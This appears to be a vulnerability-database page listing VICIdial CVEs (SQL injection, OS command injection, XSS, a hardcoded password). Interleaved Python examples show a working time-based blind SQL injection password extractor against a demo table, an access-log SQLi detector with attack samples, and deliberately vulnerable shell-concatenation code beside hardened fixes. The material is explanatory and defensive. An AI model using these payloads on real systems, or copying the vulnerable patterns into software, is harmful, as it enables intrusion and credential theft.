
CVSS: 9.0 • EPSS: 1% • CPEs: 1 • EXPL: 5

10 Sep 2024 — An attacker with authenticated access to VICIdial version 2.14-917a as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective. • https://packetstorm.news/files/id/181953 • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •

CVSS: 9.8 • EPSS: 0% • CPEs: 1 • EXPL: 2

10 Sep 2024 — An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial version 2.14-917a to enumerate database records. By default, VICIdial stores plaintext credentials within the database. • https://packetstorm.news/files/id/181460 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
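The technique the entry above describes, time-based blind SQL injection used to read records out of a table that holds plaintext credentials, as an added self-contained example. This is not VICIdial code and not the published exploit: the table, its two rows, the vulnerable lookup function and the timing threshold are all constructed for the demo, and sleep() is a user-defined SQLite function standing in for MySQL's SLEEP(). The parameterised lookup beside the vulnerable one shows why the same payload produces no delay once the parameter is bound instead of concatenated.

```python
import sqlite3
import time

# Constructed sample data (not VICIdial's schema): a users table whose
# password column is plaintext, which is the condition the advisory describes.
SAMPLE_ROWS = [("admin", "s3cret"), ("agent1", "hunter2")]

SLEEP_SECONDS = 0.05            # delay the injected sleep() introduces (assumption)
THRESHOLD = SLEEP_SECONDS / 2   # slower than this is read as "condition true"


def make_db():
    """In-memory SQLite database; sleep(n) is a stand-in for MySQL's SLEEP()."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    conn.create_function("sleep", 1, lambda n: time.sleep(float(n)) or 0)
    return conn


def vulnerable_lookup(conn, user):
    """Deliberately vulnerable (CWE-89): the parameter is concatenated into the statement."""
    sql = "SELECT user FROM users WHERE user = '" + user + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user):
    """Hardened form: a bound parameter, so quotes, comments and keywords stay data."""
    return conn.execute("SELECT user FROM users WHERE user = ?", (user,)).fetchall()


def timing_oracle(conn, lookup, payload):
    """True when the request took noticeably longer than an ordinary one."""
    start = time.monotonic()
    lookup(conn, payload)
    return time.monotonic() - start > THRESHOLD


def extract_password(conn, lookup, target_user, max_len=16):
    """Recover users.pass for target_user through the timing side channel.

    Each probe closes the string literal, ORs in a scalar subquery that sleeps
    only when one bit of one character is set, and comments out the rest of the
    statement. Seven probes per character (7-bit ASCII). substr() past the end of
    the value yields NULL, hence no delay and a code of 0, which ends the loop.
    """
    secret = ""
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(6, -1, -1):
            probe = (
                f"x' OR (SELECT CASE WHEN (unicode(substr(pass,{pos},1)) & {1 << bit}) > 0 "
                f"THEN sleep({SLEEP_SECONDS}) ELSE 0 END FROM users "
                f"WHERE user = '{target_user}')-- "
            )
            if timing_oracle(conn, lookup, probe):
                code |= 1 << bit
        if code == 0:
            break
        secret += chr(code)
    return secret


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup:    ", repr(extract_password(db, vulnerable_lookup, "admin")))
    print("parameterised lookup: ", repr(extract_password(db, safe_lookup, "admin")))
```

Against a real deployment the oracle has to be calibrated on network jitter rather than a fixed threshold, and the only fix that removes the channel is the bound parameter: a web application firewall that blocks the word SLEEP does nothing about BENCHMARK(), heavy joins, or conditional errors.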

CVSS: 6.4 • EPSS: 0% • CPEs: 4 • EXPL: 0

06 Mar 2023 — A Cross Site Scripting vulnerability in VICIdial v2.14-610c and v2.10-415c allows attackers to execute arbitrary script in a victim's browser via parameters of /agc/vicidial.php, agc/vicidial-greay.php, and /vicidial/KHOMP_admin.php. • http://vicidial.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVSS: 6.5 • EPSS: 0% • CPEs: 1 • EXPL: 0

05 Jul 2022 — Reflected Cross Site Scripting (XSS) vulnerabilities in the AST Agent Time Sheet interface (/vicidial/AST_agent_time_sheet.php) of VICIdial via the agent and search_archived_data parameters. This issue affects: VICIdial 2.14b0.5 versions prior to 3555. • https://www.vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=41300&sid=aacb27a29fefd85265b4d55fe51122af • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVSS: 9.0 • EPSS: 0% • CPEs: 1 • EXPL: 1

05 Jul 2022 — SQL Injection vulnerability in the User Stats interface (/vicidial/user_stats.php) of VICIdial via the file_download parameter allows an attacker to spoof identity, tamper with existing data, obtain complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become an administrator of the database server. • https://packetstorm.news/files/id/181209 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVSS: 9.0 • EPSS: 0% • CPEs: 1 • EXPL: 1

05 Jul 2022 — SQL Injection vulnerability in the AST Agent Time Sheet interface (/vicidial/AST_agent_time_sheet.php) of VICIdial via the agent parameter allows an attacker to spoof identity, tamper with existing data, obtain complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become an administrator of the database server. This issue affects: VICIdial 2.14b0.5 versions prior to 3555. • https://packetstorm.news/files/id/181209 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVSS: 8.8 • EPSS: 0% • CPEs: 1 • EXPL: 1

05 Jul 2022 — SQL Injection vulnerability in the admin interface (/vicidial/admin.php) of VICIdial via the modify_email_accounts, access_recordings, and agentcall_email parameters allows an attacker to spoof identity, tamper with existing data, obtain complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become an administrator of the database server. This issue affects: VICIdial 2.14b0.5 versions prior to 3555. • https://packetstorm.news/files/id/181209 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
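The three 2022 SQL injection entries above name the exact pages and parameters that act as sinks, which is enough to build a targeted detection over web-server access logs. The following is an added example, not VICIdial code or anything from the advisories: it parses combined-format log lines, looks only at the listed path/parameter pairs, and flags values containing SQL metacharacters or time-delay functions. The log lines, client addresses and payloads are constructed for the demo, and the signature is deliberately crude; tune it to your own traffic.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Sinks taken from the advisories above: page -> parameters known to be injectable.
SINKS = {
    "/vicidial/user_stats.php": {"file_download"},
    "/vicidial/AST_agent_time_sheet.php": {"agent"},
    "/vicidial/admin.php": {"modify_email_accounts", "access_recordings", "agentcall_email"},
}

# Crude SQL-injection signature: quote characters, comment openers, set operators
# and the functions used for time-based blind probing.
SQLI_RE = re.compile(r"""['"]|--|/\*|\b(?:union|select|sleep|benchmark)\b""", re.I)

# Apache/nginx combined log format: client - - [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (addresses from the documentation range 203.0.113.0/24).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jul/2022:10:00:01 +0000] "GET /vicidial/user_stats.php?user=1001&file_download=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Jul/2022:10:00:07 +0000] "GET /vicidial/user_stats.php?file_download=1%27%20UNION%20SELECT%201,2--%20 HTTP/1.1" 200 9988',
    '203.0.113.9 - - [05/Jul/2022:10:00:09 +0000] "GET /vicidial/AST_agent_time_sheet.php?agent=1001%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 2201',
    '203.0.113.12 - - [05/Jul/2022:10:00:11 +0000] "GET /vicidial/admin.php?ADD=311&modify_email_accounts=1 HTTP/1.1" 200 7000',
    '203.0.113.12 - - [05/Jul/2022:10:00:15 +0000] "GET /vicidial/welcome.php?x=%27 HTTP/1.1" 200 300',
]


def parse_line(line):
    """Split one combined-format line into client, method, path, status and decoded query."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    parts = urlsplit(target)
    return {
        "client": client,
        "method": method,
        "path": parts.path,
        "status": int(status),
        "params": parse_qs(parts.query, keep_blank_values=True),
    }


def find_sqli(lines):
    """Return (client, path, parameter, decoded value) for every suspicious sink access."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        watched = SINKS.get(rec["path"])
        if not watched:
            continue
        for name in sorted(watched.intersection(rec["params"])):
            for value in rec["params"][name]:
                # parse_qs decoded once; decode again to catch double-encoded payloads.
                value = unquote_plus(value)
                if SQLI_RE.search(value):
                    findings.append((rec["client"], rec["path"], name, value))
    return findings


if __name__ == "__main__":
    for hit in find_sqli(SAMPLE_LOG):
        print(hit)
```

Two limits worth keeping in mind: access logs carry no POST bodies, so the same parameters sent in a form post are invisible here and need a web-application-firewall or application log instead, and a quote in an unrelated page (the last sample line) is ignored on purpose to keep the rule tied to the vulnerable sinks rather than to every apostrophe in a surname.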

CVSS: 5.4 • EPSS: 0% • CPEs: 1 • EXPL: 1

15 Feb 2022 — Vicidial 2.14-783a was discovered to contain a cross-site scripting (XSS) vulnerability via the input tabs. • https://github.com/Zeyad-Azima/Vicidial-stored-XSS • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVSS: 9.8 • EPSS: 0% • CPEs: 3 • EXPL: 4

17 May 2014 — VICIDIAL dialer (aka Asterisk GUI client) 2.8-403a, 2.7, 2.7RC1, and earlier has a hardcoded password of donotedit for the (1) VDAD and (2) VDCL users, which makes it easier for remote attackers to obtain access. • https://www.exploit-db.com/exploits/29513 • CWE-255: Credentials Management Errors •

CVSS: 8.8 • EPSS: 33% • CPEs: 3 • EXPL: 6

08 Nov 2013 — VICIDIAL dialer (aka Asterisk GUI client) 2.8-403a, 2.7, 2.7RC1, and earlier allows remote authenticated users to execute arbitrary commands via shell metacharacters in the extension parameter in an OriginateVDRelogin action to manager_send.php. • https://packetstorm.news/files/id/123947 •
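Both OS command injection entries on this page (the 2013 manager_send.php issue above and the 2024 agent-to-root one at the top) come down to the same CWE-78 pattern: a request parameter spliced into a command line that a shell then interprets. The block below is an added example, not VICIdial's code and not either exploit. It shows the vulnerable pattern, the argv-style invocation that keeps metacharacters literal, and an allow-list check in front of it. `echo` stands in for the real dialer or CLI binary, and the digits-only extension format is an assumption about dial plans rather than anything the advisories state.

```python
import re
import subprocess

# Assumption: a dial-plan extension is a short string of digits. Anything else
# (including spaces, ';', '|', '`' and '$') is rejected before it reaches a command.
EXTENSION_RE = re.compile(r"[0-9]{2,10}")


def vulnerable_originate(extension):
    """Deliberately vulnerable (CWE-78): the parameter is spliced into a shell
    command line, so ';', '|', '&&' and backticks in it are executed by the shell.
    `echo` stands in for the real CLI binary."""
    cmd = "echo originate " + extension
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def argv_originate(extension):
    """No shell involved: the parameter is a single argv element and is passed
    to the program literally, metacharacters included."""
    return subprocess.run(["echo", "originate", extension], capture_output=True, text=True).stdout


def rejects(extension):
    """True when the allow-list check would refuse this value."""
    return EXTENSION_RE.fullmatch(extension) is None


def hardened_originate(extension):
    """Allow-list validation first, then the argv invocation. Either layer alone
    stops the injection; using both also keeps junk out of the dialer's logs."""
    if rejects(extension):
        raise ValueError(f"rejected extension: {extension!r}")
    return argv_originate(extension)


if __name__ == "__main__":
    tainted = "100; echo INJECTED"
    print("vulnerable:", repr(vulnerable_originate(tainted)))   # second command runs
    print("argv only: ", repr(argv_originate(tainted)))         # passed as literal text
    print("hardened:  ", repr(hardened_originate("100")))
    try:
        hardened_originate(tainted)
    except ValueError as exc:
        print("hardened:  ", exc)
```

The order of the two defences matters for a finding like the 2024 chain: once the command runs as root, the validator is the only thing standing between an agent-level SQL injection and a root shell, so it should be a strict allow-list of the expected format, never a deny-list of known-bad characters. Running the dialer's helper as an unprivileged user, so that a bypass is not immediately root, is the complementary least-privilege fix.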